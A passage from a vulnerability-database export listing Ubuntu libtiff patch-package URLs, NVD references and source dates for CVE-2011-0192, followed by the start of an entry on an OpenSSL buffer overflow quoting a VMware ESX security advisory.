            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiff-tools_3.8.2-13ubuntu0.5_lpia.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiffxx0c2_3.9.2-2ubuntu0.5_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.7.4-1ubuntu3.10.dsc"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.8.2-13ubuntu0.5_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.9.2-2ubuntu0.5_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.8.2-7ubuntu3.8_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiffxx0c2_3.8.2-13ubuntu0.5_lpia.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.9.2-2ubuntu0.5_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiff4_3.8.2-13ubuntu0.5_armel.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.9.4-2ubuntu0.2_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/universe/t/tiff/libtiff-opengl_3.8.2-13ubuntu0.5_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiff-tools_3.9.4-2ubuntu0.2_armel.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.9.2-2ubuntu0.5_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.9.2-2ubuntu0.5_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.7.4-1ubuntu3.10_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "https://launchpad.net/bugs/731540"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiffxx0c2_3.9.2-2ubuntu0.5_armel.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.9.4-2ubuntu0.2_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiff4_3.9.4-2ubuntu0.2_armel.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.7.4-1ubuntu3.10_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.8.2-13ubuntu0.5_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.8.2-13ubuntu0.5.diff.gz"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.7.4-1ubuntu3.10_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.7.4-1ubuntu3.10_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.7.4-1ubuntu3.10_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiff-tools_3.8.2-13ubuntu0.5_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.9.4-2ubuntu0.2_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiff-tools_3.8.2-13ubuntu0.5_armel.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiff-tools_3.8.2-13ubuntu0.5_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiff4-dev_3.9.2-2ubuntu0.5_armel.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.7.4-1ubuntu3.10_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.8.2-13ubuntu0.5_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiff4_3.9.2-2ubuntu0.5_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiff4_3.9.4-2ubuntu0.2_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.9.2-2ubuntu0.5_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.8.2-7ubuntu3.8_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.9.4-2ubuntu0.2_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/universe/t/tiff/libtiff-opengl_3.9.2-2ubuntu0.5_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.8.2-7ubuntu3.8_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/universe/t/tiff/libtiff-opengl_3.9.4-2ubuntu0.2_armel.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.9.2-2ubuntu0.5.dsc"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiff-tools_3.9.2-2ubuntu0.5_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.9.4-2ubuntu0.2_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiff4_3.8.2-13ubuntu0.5_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiff4-dev_3.8.2-13ubuntu0.5_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.9.4-2ubuntu0.2_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiff4-dev_3.8.2-13ubuntu0.5_armel.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.9.4-2ubuntu0.2_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.7.4-1ubuntu3.10_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.9.2-2ubuntu0.5_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiffxx0c2_3.9.4-2ubuntu0.2_armel.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.8.2-7ubuntu3.8_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/universe/t/tiff/libtiff-opengl_3.8.2-7ubuntu3.8_lpia.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiff4_3.8.2-7ubuntu3.8_lpia.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiffxx0c2_3.8.2-7ubuntu3.8_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.8.2-13ubuntu0.5_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.8.2-7ubuntu3.8_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/universe/t/tiff/libtiff-opengl_3.8.2-13ubuntu0.5_armel.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.8.2-7ubuntu3.8_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiffxx0c2_3.8.2-7ubuntu3.8_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiff4-dev_3.9.2-2ubuntu0.5_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiff4_3.9.2-2ubuntu0.5_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-doc_3.8.2-13ubuntu0.5_all.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiff4-dev_3.8.2-7ubuntu3.8_lpia.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiff-tools_3.8.2-7ubuntu3.8_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiffxx0c2_3.8.2-13ubuntu0.5_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.9.4-2ubuntu0.2_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiff-tools_3.8.2-7ubuntu3.8_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/universe/t/tiff/libtiff-opengl_3.8.2-13ubuntu0.5_lpia.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.8.2-7ubuntu3.8_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.9.4-2ubuntu0.2_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiff4-dev_3.8.2-7ubuntu3.8_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiff4-dev_3.9.4-2ubuntu0.2_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.9.2-2ubuntu0.5_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiffxx0c2_3.8.2-13ubuntu0.5_armel.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.9.2-2ubuntu0.5_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.9.4-2ubuntu0.2_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiffxx0c2_3.8.2-7ubuntu3.8_lpia.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiff-tools_3.9.2-2ubuntu0.5_armel.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.9.2-2ubuntu0.5_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiffxx0c2_3.9.2-2ubuntu0.5_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.7.4-1ubuntu3.10_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/universe/t/tiff/libtiff-opengl_3.9.2-2ubuntu0.5_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.8.2-13ubuntu0.5_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.8.2-7ubuntu3.8_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.7.4-1ubuntu3.10_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.7.4-1ubuntu3.10.diff.gz"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/universe/t/tiff/libtiff-opengl_3.9.2-2ubuntu0.5_armel.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/universe/t/tiff/libtiff-opengl_3.8.2-13ubuntu0.5_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.7.4-1ubuntu3.10_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.7.4-1ubuntu3.10_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiffxx0c2_3.8.2-13ubuntu0.5_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.8.2-13ubuntu0.5_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/universe/t/tiff/libtiff-opengl_3.8.2-7ubuntu3.8_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.8.2-13ubuntu0.5_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.8.2-13ubuntu0.5_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/universe/t/tiff/libtiff-opengl_3.8.2-7ubuntu3.8_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/t/tiff/libtiff4_3.8.2-7ubuntu3.8_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-doc_3.9.2-2ubuntu0.5_all.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.8.2-7ubuntu3.8_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.7.4-1ubuntu3.10_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-2443"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2009-5022"
          },
          {
            "trust": 0.1,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-2347"
          },
          {
            "trust": 0.1,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-3401"
          },
          {
            "trust": 0.1,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-1167"
          },
          {
            "trust": 0.1,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-2113"
          },
          {
            "trust": 0.1,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-2482"
          },
          {
            "trust": 0.1,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-2597"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2012-3401"
          },
          {
            "trust": 0.1,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-2596"
          },
          {
            "trust": 0.1,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-2595"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2010-2631"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2010-2481"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1173"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2009-2347"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2012-2088"
          },
          {
            "trust": 0.1,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-2233"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2010-2065"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2010-2067"
          },
          {
            "trust": 0.1,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-4665"
          },
          {
            "trust": 0.1,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0192"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2010-2233"
          },
          {
            "trust": 0.1,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-2483"
          },
          {
            "trust": 0.1,
            "url": "http://creativecommons.org/licenses/by-sa/2.5"
          },
          {
            "trust": 0.1,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-2088"
          },
          {
            "trust": 0.1,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-2065"
          },
          {
            "trust": 0.1,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-5022"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2010-2443"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2012-2113"
          },
          {
            "trust": 0.1,
            "url": "http://security.gentoo.org/"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2010-1411"
          },
          {
            "trust": 0.1,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-2067"
          },
          {
            "trust": 0.1,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-2481"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4665"
          },
          {
            "trust": 0.1,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1173"
          },
          {
            "trust": 0.1,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-2631"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2010-2596"
          },
          {
            "trust": 0.1,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-2630"
          },
          {
            "trust": 0.1,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-1411"
          },
          {
            "trust": 0.1,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3087"
          },
          {
            "trust": 0.1,
            "url": "https://bugs.gentoo.org."
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3232"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3389"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3427"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3259"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2011-0184"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2011-0206"
          },
          {
            "trust": 0.1,
            "url": "https://www.trapkit.de"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2011-0259"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2011-0235"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2011-0187"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2011-0254"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2011-0238"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2011-0983"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1117"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1109"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1115"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2011-0233"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2011-0166"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2011-0234"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2011-0242"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2011-0255"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2011-0981"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2011-0222"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1114"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2011-0221"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1107"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2011-0218"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2011-0225"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2011-0208"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2011-0232"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-48137"
          },
          {
            "db": "BID",
            "id": "46658"
          },
          {
            "db": "PACKETSTORM",
            "id": "100027"
          },
          {
            "db": "PACKETSTORM",
            "id": "99031"
          },
          {
            "db": "PACKETSTORM",
            "id": "99337"
          },
          {
            "db": "PACKETSTORM",
            "id": "116799"
          },
          {
            "db": "PACKETSTORM",
            "id": "105737"
          },
          {
            "db": "PACKETSTORM",
            "id": "105736"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201103-112"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2011-001352"
          },
          {
            "db": "NVD",
            "id": "CVE-2011-0192"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULHUB",
            "id": "VHN-48137"
          },
          {
            "db": "BID",
            "id": "46658"
          },
          {
            "db": "PACKETSTORM",
            "id": "100027"
          },
          {
            "db": "PACKETSTORM",
            "id": "99031"
          },
          {
            "db": "PACKETSTORM",
            "id": "99337"
          },
          {
            "db": "PACKETSTORM",
            "id": "116799"
          },
          {
            "db": "PACKETSTORM",
            "id": "105737"
          },
          {
            "db": "PACKETSTORM",
            "id": "105736"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201103-112"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2011-001352"
          },
          {
            "db": "NVD",
            "id": "CVE-2011-0192"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2011-03-03T00:00:00",
            "db": "VULHUB",
            "id": "VHN-48137"
          },
          {
            "date": "2011-03-02T00:00:00",
            "db": "BID",
            "id": "46658"
          },
          {
            "date": "2011-04-04T16:47:55",
            "db": "PACKETSTORM",
            "id": "100027"
          },
          {
            "date": "2011-03-07T16:03:11",
            "db": "PACKETSTORM",
            "id": "99031"
          },
          {
            "date": "2011-03-15T20:48:58",
            "db": "PACKETSTORM",
            "id": "99337"
          },
          {
            "date": "2012-09-24T15:01:54",
            "db": "PACKETSTORM",
            "id": "116799"
          },
          {
            "date": "2011-10-13T02:32:41",
            "db": "PACKETSTORM",
            "id": "105737"
          },
          {
            "date": "2011-10-13T02:28:22",
            "db": "PACKETSTORM",
            "id": "105736"
          },
          {
            "date": "2011-03-04T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201103-112"
          },
          {
            "date": "2011-04-05T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2011-001352"
          },
          {
            "date": "2011-03-03T20:00:02.643000",
            "db": "NVD",
            "id": "CVE-2011-0192"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2014-02-21T00:00:00",
            "db": "VULHUB",
            "id": "VHN-48137"
          },
          {
            "date": "2015-05-07T17:14:00",
            "db": "BID",
            "id": "46658"
          },
          {
            "date": "2020-07-10T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201103-112"
          },
          {
            "date": "2012-04-17T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2011-001352"
          },
          {
            "date": "2025-04-11T00:51:21.963000",
            "db": "NVD",
            "id": "CVE-2011-0192"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201103-112"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "plural  Apple Product  LIBTIFF Vulnerable to buffer overflow",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2011-001352"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "buffer error",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201103-112"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-200110-0182

    Vulnerability from variot - Updated: 2026-03-09 20:18

    Buffer overflow in the SSL_get_shared_ciphers function in OpenSSL 0.9.7 before 0.9.7l, 0.9.8 before 0.9.8d, and earlier versions has unspecified impact and remote attack vectors involving a long list of ciphers. A flaw in the OpenSSL library could allow a remote attacker to cause a denial of service on an affected application. Multiple RSA implementations fail to properly handle RSA signatures. This vulnerability may allow an attacker to forge RSA signatures. Successfully exploiting this issue may result in the execution of arbitrary machine code in the context of applications that use the affected library. Failed exploit attempts may crash applications, denying service to legitimate users. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256


                   VMware Security Advisory
    

    Advisory ID: VMSA-2007-0001 Synopsis: VMware ESX server security updates Issue date: 2007-01-08 Updated on: 2007-01-08 CVE: CVE-2006-3589 CVE-2006-2937 CVE-2006-2940 CVE-2006-3738 CVE-2006-4339 CVE-2006-4343 CVE-2006-4980


    1. Summary:

    Updated ESX Patches address several security issues.

    1. Relevant releases:

    VMware ESX 3.0.1 without patch ESX-9986131 VMware ESX 3.0.0 without patch ESX-3069097

    VMware ESX 2.5.4 prior to upgrade patch 3 VMware ESX 2.5.3 prior to upgrade patch 6 VMware ESX 2.1.3 prior to upgrade patch 4 VMware ESX 2.0.2 prior to upgrade patch 4

    1. Problem description:

    Problems addressed by these patches:

    a. Incorrect permissions on SSL key files generated by vmware-config (CVE-2006-3589):

    ESX 3.0.1: does not have this problem
    ESX 3.0.0: does not have this problem
    ESX 2.5.4: corrected by ESX 2.5.4 Upgrade Patch 3 (Build# 36502)
    ESX 2.5.3: corrected by ESX 2.5.3 Upgrade Patch 6 (Build# 35703)
    ESX 2.1.3: corrected by ESX 2.1.3 Upgrade Patch 4 (Build# 35803)
